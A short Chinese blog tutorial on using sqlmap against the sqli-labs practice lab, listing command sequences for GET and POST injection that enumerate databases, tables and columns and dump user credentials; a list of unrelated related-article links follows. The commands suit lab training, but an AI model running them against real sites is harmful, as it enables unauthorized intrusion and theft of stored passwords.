当前位置: 首页 > article >正文

sqlmap使用(以sqli-lab为例)

1.get使用方法:(Less-1 **Error Based- String**)

1.查看是否有注入点:sqlmap -u 网址
2.爆出数据库名:sqlmap -u 网址 --dbs
3.爆出数据库表名  sqlmap -u 网址 -D 'security' --tables
4.爆出指定表的列名:  sqlmap -u 网址 -D 'security' -T 'users' --columns
5.dump出数据:sqlmap -u -D security -T users -C id,password,username --dump

2.post使用方法:(Less-11- Error Based- String)
1.使用burp抓包,将请求内容保存在txt文件中(或者使用-u 网址 --data ‘data’来代替)
sqlmap -r   文件位置
2.爆出数据库名:sqlmap -r 文件位置 --dbs
3.爆出表名:sqlmap -r 文件位置 -D XXX --tables
4.爆出列名:sqlmap -r 文件位置 -D xxx -T xxx -columns
5.dump出数据: sqlmap -r 文件位置 -D xxx -T xxx -C xxx --dump

Less-12- Error Based- Double quotes- String

参考链接:

详细sqli-labs(1-65)通关讲解_数据库_糊涂是福yyyy-DevPress官方社区 (csdn.net)


http://www.kler.cn/a/9440.html

相关文章:

  • git status 命令卡顿的排查
  • arm 汇编技巧
  • 飞凌嵌入式FET527N-C核心板现已适配Android 13
  • 【网络协议栈】网络层(上)网络层的基本理解、IP协议格式、网络层分组(内附手画分析图 简单易懂)
  • PCL 点云拟合 Ransac拟合圆柱
  • MFC中Excel的导入以及使用步骤
  • 【Leetcode之路 | Java Python】两数之和(暴力枚举哈希表)
  • 基于发票增值税OCR API设计自动识别应用系统,从此解放财务双手
  • 【图像分割】Segment Anything(Meta AI)论文解读
  • 经典文献阅读之--Bidirectional Camera-LiDAR Fusion(Camera-LiDAR双向融合新范式)
  • Java -- System类和冒泡排序
  • SpringBoot集成ChatGPT实现AI聊天
  • 护眼灯真的可以保护眼睛吗?推荐五款达到护眼级别的灯
  • SVN
  • C/C++每日一练(20230412)
  • 全国青少年信息素养大赛Python编程挑战赛初赛试题说明
  • AI助手帮你轻松做好Imagenet数据集重命名与复制
  • 本明杰富兰克林自律十三条
  • 【NLP入门教程】三、词性标注
  • KNN、SVM、MLP、K-means分类实验
  • chapter-4-数据库语句
  • 一般形式的S曲线公式推导
  • 项目的总结
  • OpenCV基础之边缘检测与轮廓描绘
  • VScode 自动格式化配置
  • 【启动图片与控制器大小的关系 Objective-C语言】